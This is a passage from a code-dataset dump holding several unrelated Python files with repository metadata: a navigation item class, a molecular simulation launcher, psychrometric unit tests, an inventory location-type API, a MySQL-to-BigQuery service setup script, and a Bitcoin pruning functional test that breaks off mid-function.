self._items_mapping[item.ident] = item
def __delitem__(self, index):
item = self[index]
del self._items[index]
del self._items_mapping[item.ident]
def __len__(self):
return len(self._items)
def __iter__(self):
return iter(self._items)
def insert(self, index, item):
self._items.insert(index, item)
self._items_mapping[item.ident] = item
class ItemReference(collections.namedtuple('ItemReference', 'endpoint args')):
"""The identity tuple of navigation item.
:param endpoint: the endpoint of view function.
:type endpoint: ``str``
:param args: the arguments of view function.
:type args: ``dict``
"""
def __new__(cls, endpoint, args=()):
if isinstance(args, dict):
args = freeze_dict(args)
return super(cls, ItemReference).__new__(cls, endpoint, args)
| 33.181818 | 83 | 0.610959 |
ace8cd3a33ad57184a4257b93d404cfed41172e4 | 951 | py | Python | pele_platform/gpcr/main.py | TheKipiDragon/pele_platform | bb33fb69741685d423bdccda4ed104fd0b70ed5b | [
"Apache-2.0"
] | null | null | null | pele_platform/gpcr/main.py | TheKipiDragon/pele_platform | bb33fb69741685d423bdccda4ed104fd0b70ed5b | [
"Apache-2.0"
] | null | null | null | pele_platform/gpcr/main.py | TheKipiDragon/pele_platform | bb33fb69741685d423bdccda4ed104fd0b70ed5b | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
import pele_platform.Adaptive.simulation as si
import pele_platform.Utilities.Helpers.helpers as hp
import pele_platform.Utilities.Parameters.pele_env as pv
@dataclass
class GpcrLauncher():
args: pv.EnviroBuilder
def run_gpcr_simulation(self) -> pv.EnviroBuilder:
#Set parameters for gpcr and launch simulation
self._set_parameters()
simulation_parameters = si.run_adaptive(self.args)
return simulation_parameters
def _set_parameters(self) -> None:
# Set box and initial ligand position
self.orthosteric_site = self.args.orthosteric_site
self.initial_site = self.args.initial_site
self.args.center_of_interface = self.initial_site
self.args.box_center, self.args.box_radius = hp.retrieve_box(
self.args.system, self.initial_site, self.orthosteric_site,
weights=[0.35, 0.65])
self.args.randomize = True
| 33.964286 | 69 | 0.729758 |
ace8cda4822ed1b6bedc2a8f53a1303c374a408b | 12,125 | py | Python | tests/test_psychrolib_ip.py | hongyuanjia/psychrolib | eb2bbcc2a50b5d612287d459f327ebb743bbcf01 | [
"MIT"
] | 119 | 2018-11-30T10:07:59.000Z | 2022-03-31T18:54:41.000Z | tests/test_psychrolib_ip.py | hongyuanjia/psychrolib | eb2bbcc2a50b5d612287d459f327ebb743bbcf01 | [
"MIT"
] | 67 | 2018-12-08T23:09:25.000Z | 2022-02-18T15:16:14.000Z | tests/test_psychrolib_ip.py | hongyuanjia/psychrolib | eb2bbcc2a50b5d612287d459f327ebb743bbcf01 | [
"MIT"
] | 44 | 2018-12-08T21:02:56.000Z | 2022-01-30T18:44:43.000Z | # PsychroLib (version 2.5.0) (https://github.com/psychrometrics/psychrolib).
# Copyright (c) 2018-2020 The PsychroLib Contributors. Licensed under the MIT License.
# Test of PsychroLib in IP units for Python, C, and Fortran.
import numpy as np
import pytest
pytestmark = pytest.mark.usefixtures('SetUnitSystem_IP')
# Test of helper functions
def test_GetTRankineFromTFahrenheit(psy):
assert psy.GetTRankineFromTFahrenheit(70) == pytest.approx(529.67, rel = 0.000001)
def test_GetTFahrenheitFromTRankine(psy):
assert psy.GetTFahrenheitFromTRankine(529.67) == pytest.approx(70, rel = 0.000001)
###############################################################################
# Tests at saturation
###############################################################################
# Test saturation vapour pressure calculation
# The values are tested against the values published in Table 3 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
# over the range [-148, +392] F
# ASHRAE's assertion is that the formula is within 300 ppm of the true values, which is true except for the value at -76 F
def test_GetSatVapPres(psy):
assert psy.GetSatVapPres(-76) == pytest.approx(0.000157, abs = 0.00001)
assert psy.GetSatVapPres( -4) == pytest.approx(0.014974, rel = 0.0003)
assert psy.GetSatVapPres( 23) == pytest.approx(0.058268, rel = 0.0003)
assert psy.GetSatVapPres( 41) == pytest.approx(0.12656, rel = 0.0003)
assert psy.GetSatVapPres( 77) == pytest.approx(0.45973, rel = 0.0003)
assert psy.GetSatVapPres(122) == pytest.approx(1.79140, rel = 0.0003)
assert psy.GetSatVapPres(212) == pytest.approx(14.7094, rel = 0.0003)
assert psy.GetSatVapPres(300) == pytest.approx(67.0206, rel = 0.0003)
# Test that the NR in GetTDewPointFromVapPres converges.
# This test was known problem in versions of PsychroLib <= 2.0.0
def test_GetTDewPointFromVapPres_convergence(psy):
TDryBulb = np.arange(-148, 392, 1)
RelHum = np.arange(0, 1, 0.1)
Pressure = np.arange(8.6, 17.4, 1)
for T in TDryBulb:
for RH in RelHum:
for p in Pressure:
psy.GetTWetBulbFromRelHum(T, RH, p)
print('GetTDewPointFromVapPres converged')
# Test saturation humidity ratio
# The values are tested against those published in Table 2 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
# Agreement is not terrific - up to 2% difference with the values published in the table
def test_GetSatHumRatio(psy):
assert psy.GetSatHumRatio(-58, 14.696) == pytest.approx(0.0000243, rel = 0.01)
assert psy.GetSatHumRatio( -4, 14.696) == pytest.approx(0.0006373, rel = 0.01)
assert psy.GetSatHumRatio( 23, 14.696) == pytest.approx(0.0024863, rel = 0.005)
assert psy.GetSatHumRatio( 41, 14.696) == pytest.approx(0.005425, rel = 0.005)
assert psy.GetSatHumRatio( 77, 14.696) == pytest.approx(0.020173, rel = 0.005)
assert psy.GetSatHumRatio(122, 14.696) == pytest.approx(0.086863, rel = 0.01)
assert psy.GetSatHumRatio(185, 14.696) == pytest.approx(0.838105, rel = 0.02)
# Test enthalpy at saturation
# The values are tested against those published in Table 2 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
# Agreement is rarely better than 1%, and close to 3% at -5 C
def test_GetSatAirEnthalpy(psy):
assert psy.GetSatAirEnthalpy(-58, 14.696) == pytest.approx(-13.906, rel = 0.01)
assert psy.GetSatAirEnthalpy( -4, 14.696) == pytest.approx( -0.286, rel = 0.01)
assert psy.GetSatAirEnthalpy( 23, 14.696) == pytest.approx( 8.186, rel = 0.03)
assert psy.GetSatAirEnthalpy( 41, 14.696) == pytest.approx( 15.699, rel = 0.01)
assert psy.GetSatAirEnthalpy( 77, 14.696) == pytest.approx( 40.576, rel = 0.01)
assert psy.GetSatAirEnthalpy(122, 14.696) == pytest.approx(126.066, rel = 0.01)
assert psy.GetSatAirEnthalpy(185, 14.696) == pytest.approx(999.749, rel = 0.01)
###############################################################################
# Test of primary relationships between wet bulb temperature, humidity ratio, vapour pressure, relative humidity, and dew point temperatures
# These relationships are identified with bold arrows in the doc's diagram
###############################################################################
# Test of relationships between vapour pressure and dew point temperature
# No need to test vapour pressure calculation as it is just the saturation vapour pressure tested above
def test_VapPres_TDewPoint(psy):
VapPres = psy.GetVapPresFromTDewPoint(-4.0)
assert psy.GetTDewPointFromVapPres(59.0, VapPres) == pytest.approx(-4.0, abs = 0.001)
VapPres = psy.GetVapPresFromTDewPoint(41.0)
assert psy.GetTDewPointFromVapPres(59.0, VapPres) == pytest.approx(41.0, abs = 0.001)
VapPres = psy.GetVapPresFromTDewPoint(122.0)
assert psy.GetTDewPointFromVapPres(140.0, VapPres) == pytest.approx(122.0, abs = 0.001)
## Test of relationships between humidity ratio and vapour pressure
## Humidity ratio values to test against are calculated with Excel
def test_HumRatio_VapPres(psy):
HumRatio = psy.GetHumRatioFromVapPres(0.45973, 14.175) # conditions at 77 F, std atm pressure at 1000 ft
assert HumRatio == pytest.approx(0.0208473311024865, rel = 0.000001)
VapPres = psy.GetVapPresFromHumRatio(HumRatio, 14.175)
assert VapPres == pytest.approx(0.45973, abs = 0.00001)
## Test of relationships between vapour pressure and relative humidity
def test_VapPres_RelHum(psy):
VapPres = psy.GetVapPresFromRelHum(77, 0.8)
assert VapPres == pytest.approx(0.45973*0.8, rel = 0.0003)
RelHum = psy.GetRelHumFromVapPres(77, VapPres)
assert RelHum == pytest.approx(0.8, rel = 0.0003)
## Test of relationships between humidity ratio and wet bulb temperature
## The formulae are tested for two conditions, one above freezing and the other below
## Humidity ratio values to test against are calculated with Excel
def test_HumRatio_TWetBulb(psy):
# Above freezing
HumRatio = psy.GetHumRatioFromTWetBulb(86, 77, 14.175)
assert HumRatio == pytest.approx(0.0187193288418892, rel = 0.0003)
TWetBulb = psy.GetTWetBulbFromHumRatio(86, HumRatio, 14.175)
assert TWetBulb == pytest.approx(77, abs = 0.001)
# Below freezing
HumRatio = psy.GetHumRatioFromTWetBulb(30.2, 23.0, 14.175)
assert HumRatio == pytest.approx(0.00114657481090184, rel = 0.0003)
TWetBulb = psy.GetTWetBulbFromHumRatio(30.2, HumRatio, 14.1751)
assert TWetBulb == pytest.approx(23.0, abs = 0.001)
# Low HumRatio -- this should evaluate true as we clamp the HumRation to 1e-07.
assert psy.GetTWetBulbFromHumRatio(25,1e-09,95461) == psy.GetTWetBulbFromHumRatio(25,1e-07,95461)
###############################################################################
# Dry air calculations
###############################################################################
# Values are compared against values found in Table 2 of ch. 1 of the ASHRAE Handbook - Fundamentals
# Note: the accuracy of the formula is not better than 0.1%, apparently
def test_DryAir(psy):
assert psy.GetDryAirEnthalpy(77) == pytest.approx(18.498, rel = 0.001)
assert psy.GetDryAirVolume(77, 14.696) == pytest.approx(13.5251, rel = 0.001)
assert psy.GetDryAirDensity(77, 14.696) == pytest.approx(1/13.5251, rel = 0.001)
assert psy.GetTDryBulbFromEnthalpyAndHumRatio(42.6168, 0.02) == pytest.approx(85.97, abs = 0.05)
assert psy.GetHumRatioFromEnthalpyAndTDryBulb(42.6168, 86) == pytest.approx(0.02, rel = 0.001)
###############################################################################
# Moist air calculations
###############################################################################
# Values are compared against values calculated with Excel
def test_MoistAir(psy):
assert psy.GetMoistAirEnthalpy(86, 0.02) == pytest.approx(42.6168, rel = 0.0003)
assert psy.GetMoistAirVolume(86, 0.02, 14.175) == pytest.approx(14.7205749002918, rel = 0.0003)
assert psy.GetMoistAirDensity(86, 0.02, 14.175) == pytest.approx(0.0692907720594378, rel = 0.0003)
def test_GetTDryBulbFromMoistAirVolumeAndHumRatio(psy):
assert psy.GetTDryBulbFromMoistAirVolumeAndHumRatio(14.7205749002918, 0.02, 14.175) == pytest.approx(86, rel = 0.0003)
###############################################################################
# Test standard atmosphere
###############################################################################
# The functions are tested against Table 1 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
def test_GetStandardAtmPressure(psy):
assert psy.GetStandardAtmPressure(-1000) == pytest.approx(15.236, abs = 1)
assert psy.GetStandardAtmPressure( 0) == pytest.approx(14.696, abs = 1)
assert psy.GetStandardAtmPressure( 1000) == pytest.approx(14.175, abs = 1)
assert psy.GetStandardAtmPressure( 3000) == pytest.approx(13.173, abs = 1)
assert psy.GetStandardAtmPressure(10000) == pytest.approx(10.108, abs = 1)
assert psy.GetStandardAtmPressure(30000) == pytest.approx( 4.371, abs = 1)
def test_GetStandardAtmTemperature(psy):
assert psy.GetStandardAtmTemperature(-1000) == pytest.approx( 62.6, abs = 0.1)
assert psy.GetStandardAtmTemperature( 0) == pytest.approx( 59.0, abs = 0.1)
assert psy.GetStandardAtmTemperature( 1000) == pytest.approx( 55.4, abs = 0.1)
assert psy.GetStandardAtmTemperature( 3000) == pytest.approx( 48.3, abs = 0.1)
assert psy.GetStandardAtmTemperature(10000) == pytest.approx( 23.4, abs = 0.1)
assert psy.GetStandardAtmTemperature(30000) == pytest.approx(-47.8, abs = 0.2) # Doesn't work with abs = 0.1
###############################################################################
# Test sea level pressure conversions
###############################################################################
# Test sea level pressure calculation against https://keisan.casio.com/exec/system/1224575267,
# converted to IP
def test_SeaLevel_Station_Pressure(psy):
SeaLevelPressure = psy.GetSeaLevelPressure(14.681662559, 344.488, 62.942)
assert SeaLevelPressure == pytest.approx(14.8640475, abs = 0.0001)
assert psy.GetStationPressure(SeaLevelPressure, 344.488, 62.942) == pytest.approx(14.681662559, abs = 0.0001)
###############################################################################
# Test conversion between humidity types
###############################################################################
def test_GetSpecificHumFromHumRatio(psy):
assert psy.GetSpecificHumFromHumRatio(0.006) == pytest.approx(0.00596421471, rel=0.01)
def test_GetHumRatioFromSpecificHum(psy):
assert psy.GetHumRatioFromSpecificHum(0.00596421471) == pytest.approx(0.006, rel=0.01)
###############################################################################
# Test against Example 1 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
###############################################################################
def test_AllPsychrometrics(psy):
# This is example 1. The values are provided in the text of the Handbook
HumRatio, TDewPoint, RelHum, VapPres, MoistAirEnthalpy, MoistAirVolume, DegreeOfSaturation = \
psy.CalcPsychrometricsFromTWetBulb(100, 65, 14.696)
assert HumRatio == pytest.approx(0.00523, abs = 0.001)
assert TDewPoint == pytest.approx(40, abs = 1.0) # not great agreement
assert RelHum == pytest.approx(0.13, abs = 0.01)
assert MoistAirEnthalpy == pytest.approx(29.80, abs = 0.1)
assert MoistAirVolume == pytest.approx(14.22, rel = 0.01)
# Reverse calculation: recalculate wet bulb temperature from dew point temperature
HumRatio, TWetBulb, RelHum, VapPres, MoistAirEnthalpy, MoistAirVolume, DegreeOfSaturation = \
psy.CalcPsychrometricsFromTDewPoint(100, TDewPoint, 14.696)
assert TWetBulb == pytest.approx(65, abs = 0.1)
# Reverse calculation: recalculate wet bulb temperature from relative humidity
HumRatio, TWetBulb, TDewPoint, VapPres, MoistAirEnthalpy, MoistAirVolume, DegreeOfSaturation = \
psy.CalcPsychrometricsFromRelHum(100, RelHum, 14.696)
assert TWetBulb == pytest.approx(65, abs = 0.1)
| 56.658879 | 140 | 0.654268 |
ace8cdbf1b3b2b44a862b3a73378fb92054ef38f | 5,115 | py | Python | symphony/cli/pyinventory/api/location_type.py | rohan-prasad/magma | 2c1f36d2fd04eae90366cc8b314eaab656d7f8ad | [
"BSD-3-Clause"
] | null | null | null | symphony/cli/pyinventory/api/location_type.py | rohan-prasad/magma | 2c1f36d2fd04eae90366cc8b314eaab656d7f8ad | [
"BSD-3-Clause"
] | 6 | 2021-03-31T19:59:59.000Z | 2022-01-22T12:56:47.000Z | symphony/cli/pyinventory/api/location_type.py | fbcode/magma_old | 054ef8e079478bda36d2b13b8a88386c6dc94ef2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2004-present Facebook All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from typing import List
from pysymphony import SymphonyClient
from ..common.cache import LOCATION_TYPES
from ..common.data_class import Location, LocationType, PropertyDefinition
from ..common.data_enum import Entity
from ..common.data_format import (
format_to_property_definitions,
format_to_property_type_inputs,
)
from ..exceptions import EntityNotFoundError
from ..graphql.input.add_location_type import AddLocationTypeInput
from ..graphql.mutation.add_location_type import AddLocationTypeMutation
from ..graphql.mutation.remove_location_type import RemoveLocationTypeMutation
from ..graphql.query.location_type_locations import LocationTypeLocationsQuery
from ..graphql.query.location_types import LocationTypesQuery
from .location import delete_location
def _populate_location_types(client: SymphonyClient) -> None:
location_types = LocationTypesQuery.execute(client)
if not location_types:
return
edges = location_types.edges
for edge in edges:
node = edge.node
if node:
LOCATION_TYPES[node.name] = LocationType(
name=node.name,
id=node.id,
property_types=format_to_property_definitions(node.propertyTypes),
)
def add_location_type(
client: SymphonyClient,
name: str,
properties: List[PropertyDefinition],
map_zoom_level: int = 8,
) -> LocationType:
"""This function creates new location type.
Args:
name (str): location type name
properties (List[ `pyinventory.common.data_class.PropertyDefinition` ]): list of property definitions
map_zoom_level (int): map zoom level
Returns:
`pyinventory.common.data_class.LocationType` object
Raises:
FailedOperationException: internal inventory error
Example:
```
location_type = client.add_location_type(
name="city",
properties=[
PropertyDefinition(
property_name="Contact",
property_kind=PropertyKind.string,
default_raw_value=None,
is_fixed=True
)
],
map_zoom_level=5,
)
```
"""
new_property_types = format_to_property_type_inputs(data=properties)
result = AddLocationTypeMutation.execute(
client,
AddLocationTypeInput(
name=name,
mapZoomLevel=map_zoom_level,
properties=new_property_types,
surveyTemplateCategories=[],
),
)
location_type = LocationType(
name=result.name,
id=result.id,
property_types=format_to_property_definitions(result.propertyTypes),
)
LOCATION_TYPES[result.name] = location_type
return location_type
def delete_locations_by_location_type(
client: SymphonyClient, location_type: LocationType
) -> None:
"""Delete locatons by location type.
Args:
location_type ( `pyinventory.common.data_class.LocationType` ): location type object
Raises:
`pyinventory.exceptions.EntityNotFoundError`: if location_type does not exist
Example:
```
client.delete_locations_by_location_type(location_type=location_type)
```
"""
location_type_with_locations = LocationTypeLocationsQuery.execute(
client, id=location_type.id
)
if location_type_with_locations is None:
raise EntityNotFoundError(
entity=Entity.LocationType, entity_id=location_type.id
)
locations = location_type_with_locations.locations
if locations is None:
return
for location in locations.edges:
node = location.node
if node:
delete_location(
client,
Location(
id=node.id,
name=node.name,
latitude=node.latitude,
longitude=node.longitude,
external_id=node.externalId,
location_type_name=node.locationType.name,
properties=node.properties,
),
)
def delete_location_type_with_locations(
client: SymphonyClient, location_type: LocationType
) -> None:
"""Delete locaton type with existing locations.
Args:
location_type (`pyinventory.common.data_class.LocationType`): location type object
Raises:
`pyinventory.exceptions.EntityNotFoundError`: if location_type does not exist
Example:
```
client.delete_location_type_with_locations(location_type=location_type)
```
"""
delete_locations_by_location_type(client, location_type)
RemoveLocationTypeMutation.execute(client, id=location_type.id)
| 32.579618 | 113 | 0.647312 |
ace8ce28b1e8e6c9e6095c5dc4adb330c43e26bf | 3,663 | py | Python | src/add_service.py | beirving/mysql-to-bigquery | 75dfe3390f1e1a0dc54d5cace0cf1a89a0560ae6 | [
"MIT"
] | null | null | null | src/add_service.py | beirving/mysql-to-bigquery | 75dfe3390f1e1a0dc54d5cace0cf1a89a0560ae6 | [
"MIT"
] | null | null | null | src/add_service.py | beirving/mysql-to-bigquery | 75dfe3390f1e1a0dc54d5cace0cf1a89a0560ae6 | [
"MIT"
] | null | null | null | import os
import re
import pandas as pd
from prefect import Task, Flow
from cryptography.fernet import Fernet
from google.oauth2 import service_account
from mysql_bigquery.adapters.storage import StorageAdapter
from mysql_bigquery.adapters.bigquery import BigQueryAdapter
from mysql_bigquery.adapters.stackdriver import StackDriverAdapter
import mysql_bigquery.prefect_utils.add.storage as storage_add
import mysql_bigquery.prefect_utils.add.big_query as big_query_add
import mysql_bigquery.prefect_utils.add.populate_tracking_table as populate
class AddService(Task):
def __init__(self):
self.service = None
self.data_set = None
self.host = None
self.user = None
self.password = None
self.database = None
self.key = None
self.service_account = service_account.Credentials.from_service_account_file(
os.environ['MYSQL_BIG_QUERY_GOOGLE_AUTH']
)
self.sd_logger = StackDriverAdapter(self.service_account)
self.sd_logger.get_client()
self.sd_logger.create_logger(f"add-service")
def generate_key(self):
self.key = Fernet.generate_key()
def set_attribute(self, attribute: str, value: str, encode: bool = False):
if encode:
f = Fernet(self.key)
encoded = f.encrypt(bytes(value, encoding='utf-8'))
value = str(encoded, 'utf-8')
setattr(self, attribute, value)
def save_key(self):
storage_client = StorageAdapter(self.service_account)
storage_client.get_client()
result = storage_client.write_string(
bucket='mysql_sync_keys',
destination=f"{self.service}",
string=self.key
)
if result is False:
raise RuntimeError(storage_client.errors)
def save_record(self):
record = {
'service': [self.service],
'data_set': [self.data_set],
'host': [self.host],
'user': [self.user],
'password': [self.password],
'database': [self.database]
}
df = pd.DataFrame(record)
big_query = BigQueryAdapter(self.service_account)
big_query.get_client()
big_query.set_data_set_ref('mysql_sync')
big_query.set_table_ref('data_sources')
result = big_query.upload_data_frame(df)
if result is False:
self.sd_logger.error(
big_query.errors,
{'class': 'AddService', 'method': 'save_record'}
)
def storage(self):
return storage_add.storage_flow_runner(self.service)
def big_query(self):
return big_query_add.big_query_flow_runner(self.service)
def populate_tracking(self):
return populate.populate_tracking_table_flow_runner(self.service)
def run_set_up(self):
service = input('Service Name: ')
service = re.sub(r"[^\w]|_", '-', service)
self.set_attribute('service', service)
data_set = input('Data Set: ')
data_set = re.sub(r"[^\w]|-", '_', data_set)
self.set_attribute('data_set', data_set)
self.set_attribute('host', input('MySQL Host Connection: '), True)
self.set_attribute('user', input('MySQL Connection User: '), True)
self.set_attribute('password', input('MySQL Connection Password: '), True)
self.set_attribute('database', input('MySQL Database: '))
with Flow('Add Service') as flow:
add = AddService()
add.generate_key()
add.run_set_up()
add.save_key()
add.save_record()
add.storage()
add.big_query()
add.populate_tracking()
state = flow.run()
| 32.415929 | 85 | 0.64783 |
ace8ced42292e4478617f322a0bc00a0dc789767 | 21,420 | py | Python | qa/rpc-tests/pruning.py | alexandergaldones/bitcoin | 6206252e5073c1cde2e313f2e5a3ca17582c5823 | [
"MIT"
] | null | null | null | qa/rpc-tests/pruning.py | alexandergaldones/bitcoin | 6206252e5073c1cde2e313f2e5a3ca17582c5823 | [
"MIT"
] | 1 | 2017-03-10T16:37:46.000Z | 2017-03-10T16:37:46.000Z | qa/rpc-tests/pruning.py | PETER-ITPE/bitcoin_pjt | 53c300fb525ab3e21206d47d8353f5246b4f24d1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the pruning code.
WARNING:
This test uses 4GB of disk space.
This test takes 30 mins or more (up to 2 hours)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
import os
MIN_BLOCKS_TO_KEEP = 288
# Rescans start at the earliest block up to 2 hours before a key timestamp, so
# the manual prune RPC avoids pruning blocks in the same window to be
# compatible with pruning based on key creation time.
RESCAN_WINDOW = 2 * 60 * 60
def calc_usage(blockdir):
return sum(os.path.getsize(blockdir+f) for f in os.listdir(blockdir) if os.path.isfile(blockdir+f)) / (1024. * 1024.)
class PruneTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 6
# Cache for utxos, as the listunspent may take a long time later in the test
self.utxo_cache_0 = []
self.utxo_cache_1 = []
def setup_network(self):
self.nodes = []
self.is_network_split = False
# Create nodes 0 and 1 to mine
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=999000", "-checkblocks=5"], timewait=900))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=999000", "-checkblocks=5"], timewait=900))
# Create node 2 to test pruning
self.nodes.append(start_node(2, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-prune=550"], timewait=900))
self.prunedir = self.options.tmpdir+"/node2/regtest/blocks/"
# Create nodes 3 and 4 to test manual pruning (they will be re-started with manual pruning later)
self.nodes.append(start_node(3, self.options.tmpdir, ["-debug=0","-maxreceivebuffer=20000","-blockmaxsize=999000"], timewait=900))
self.nodes.append(start_node(4, self.options.tmpdir, ["-debug=0","-maxreceivebuffer=20000","-blockmaxsize=999000"], timewait=900))
# Create nodes 5 to test wallet in prune mode, but do not connect
self.nodes.append(start_node(5, self.options.tmpdir, ["-debug=0", "-prune=550"]))
# Determine default relay fee
self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[1], 2)
connect_nodes(self.nodes[2], 0)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[0], 4)
sync_blocks(self.nodes[0:5])
def create_big_chain(self):
# Start by creating some coinbases we can spend later
self.nodes[1].generate(200)
sync_blocks(self.nodes[0:2])
self.nodes[0].generate(150)
# Then mine enough full blocks to create more than 550MiB of data
for i in range(645):
mine_large_block(self.nodes[0], self.utxo_cache_0)
sync_blocks(self.nodes[0:5])
def test_height_min(self):
if not os.path.isfile(self.prunedir+"blk00000.dat"):
raise AssertionError("blk00000.dat is missing, pruning too early")
print("Success")
print("Though we're already using more than 550MiB, current usage:", calc_usage(self.prunedir))
print("Mining 25 more blocks should cause the first block file to be pruned")
# Pruning doesn't run until we're allocating another chunk, 20 full blocks past the height cutoff will ensure this
for i in range(25):
mine_large_block(self.nodes[0], self.utxo_cache_0)
waitstart = time.time()
while os.path.isfile(self.prunedir+"blk00000.dat"):
time.sleep(0.1)
if time.time() - waitstart > 30:
raise AssertionError("blk00000.dat not pruned when it should be")
print("Success")
usage = calc_usage(self.prunedir)
print("Usage should be below target:", usage)
if (usage > 550):
raise AssertionError("Pruning target not being met")
def create_chain_with_staleblocks(self):
# Create stale blocks in manageable sized chunks
print("Mine 24 (stale) blocks on Node 1, followed by 25 (main chain) block reorg from Node 0, for 12 rounds")
for j in range(12):
# Disconnect node 0 so it can mine a longer reorg chain without knowing about node 1's soon-to-be-stale chain
# Node 2 stays connected, so it hears about the stale blocks and then reorg's when node0 reconnects
# Stopping node 0 also clears its mempool, so it doesn't have node1's transactions to accidentally mine
self.stop_node(0)
self.nodes[0]=start_node(0, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=999000", "-checkblocks=5"], timewait=900)
# Mine 24 blocks in node 1
for i in range(24):
if j == 0:
mine_large_block(self.nodes[1], self.utxo_cache_1)
else:
self.nodes[1].generate(1) #tx's already in mempool from previous disconnects
# Reorg back with 25 block chain from node 0
for i in range(25):
mine_large_block(self.nodes[0], self.utxo_cache_0)
# Create connections in the order so both nodes can see the reorg at the same time
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
sync_blocks(self.nodes[0:3])
print("Usage can be over target because of high stale rate:", calc_usage(self.prunedir))
def reorg_test(self):
# Node 1 will mine a 300 block chain starting 287 blocks back from Node 0 and Node 2's tip
# This will cause Node 2 to do a reorg requiring 288 blocks of undo data to the reorg_test chain
# Reboot node 1 to clear its mempool (hopefully make the invalidate faster)
# Lower the block max size so we don't keep mining all our big mempool transactions (from disconnected blocks)
self.stop_node(1)
self.nodes[1]=start_node(1, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=5000", "-checkblocks=5", "-disablesafemode"], timewait=900)
height = self.nodes[1].getblockcount()
print("Current block height:", height)
invalidheight = height-287
badhash = self.nodes[1].getblockhash(invalidheight)
print("Invalidating block at height:",invalidheight,badhash)
self.nodes[1].invalidateblock(badhash)
# We've now switched to our previously mined-24 block fork on node 1, but thats not what we want
# So invalidate that fork as well, until we're on the same chain as node 0/2 (but at an ancestor 288 blocks ago)
mainchainhash = self.nodes[0].getblockhash(invalidheight - 1)
curhash = self.nodes[1].getblockhash(invalidheight - 1)
while curhash != mainchainhash:
self.nodes[1].invalidateblock(curhash)
curhash = self.nodes[1].getblockhash(invalidheight - 1)
assert(self.nodes[1].getblockcount() == invalidheight - 1)
print("New best height", self.nodes[1].getblockcount())
# Reboot node1 to clear those giant tx's from mempool
self.stop_node(1)
self.nodes[1]=start_node(1, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=5000", "-checkblocks=5", "-disablesafemode"], timewait=900)
print("Generating new longer chain of 300 more blocks")
self.nodes[1].generate(300)
print("Reconnect nodes")
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[2], 1)
sync_blocks(self.nodes[0:3], timeout=120)
print("Verify height on node 2:",self.nodes[2].getblockcount())
print("Usage possibly still high bc of stale blocks in block files:", calc_usage(self.prunedir))
print("Mine 220 more blocks so we have requisite history (some blocks will be big and cause pruning of previous chain)")
for i in range(22):
# This can be slow, so do this in multiple RPC calls to avoid
# RPC timeouts.
self.nodes[0].generate(10) #node 0 has many large tx's in its mempool from the disconnects
sync_blocks(self.nodes[0:3], timeout=300)
usage = calc_usage(self.prunedir)
print("Usage should be below target:", usage)
if (usage > 550):
raise AssertionError("Pruning target not being met")
return invalidheight,badhash
def reorg_back(self):
# Verify that a block on the old main chain fork has been pruned away
try:
self.nodes[2].getblock(self.forkhash)
raise AssertionError("Old block wasn't pruned so can't test redownload")
except JSONRPCException as e:
print("Will need to redownload block",self.forkheight)
# Verify that we have enough history to reorg back to the fork point
# Although this is more than 288 blocks, because this chain was written more recently
# and only its other 299 small and 220 large block are in the block files after it,
# its expected to still be retained
self.nodes[2].getblock(self.nodes[2].getblockhash(self.forkheight))
first_reorg_height = self.nodes[2].getblockcount()
curchainhash = self.nodes[2].getblockhash(self.mainchainheight)
self.nodes[2].invalidateblock(curchainhash)
goalbestheight = self.mainchainheight
goalbesthash = self.mainchainhash2
# As of 0.10 the current block download logic is not able to reorg to the original chain created in
# create_chain_with_stale_blocks because it doesn't know of any peer thats on that chain from which to
# redownload its missing blocks.
# Invalidate the reorg_test chain in node 0 as well, it can successfully switch to the original chain
# because it has all the block data.
# However it must mine enough blocks to have a more work chain than the reorg_test chain in order
# to trigger node 2's block download logic.
# At this point node 2 is within 288 blocks of the fork point so it will preserve its ability to reorg
if self.nodes[2].getblockcount() < self.mainchainheight:
blocks_to_mine = first_reorg_height + 1 - self.mainchainheight
print("Rewind node 0 to prev main chain to mine longer chain to trigger redownload. Blocks needed:", blocks_to_mine)
self.nodes[0].invalidateblock(curchainhash)
assert(self.nodes[0].getblockcount() == self.mainchainheight)
assert(self.nodes[0].getbestblockhash() == self.mainchainhash2)
goalbesthash = self.nodes[0].generate(blocks_to_mine)[-1]
goalbestheight = first_reorg_height + 1
print("Verify node 2 reorged back to the main chain, some blocks of which it had to redownload")
waitstart = time.time()
while self.nodes[2].getblockcount() < goalbestheight:
time.sleep(0.1)
if time.time() - waitstart > 900:
raise AssertionError("Node 2 didn't reorg to proper height")
assert(self.nodes[2].getbestblockhash() == goalbesthash)
# Verify we can now have the data for a block previously pruned
assert(self.nodes[2].getblock(self.forkhash)["height"] == self.forkheight)
def manual_test(self, node_number, use_timestamp):
# at this point, node has 995 blocks and has not yet run in prune mode
node = self.nodes[node_number] = start_node(node_number, self.options.tmpdir, ["-debug=0"], timewait=900)
assert_equal(node.getblockcount(), 995)
assert_raises_message(JSONRPCException, "not in prune mode", node.pruneblockchain, 500)
self.stop_node(node_number)
# now re-start in manual pruning mode
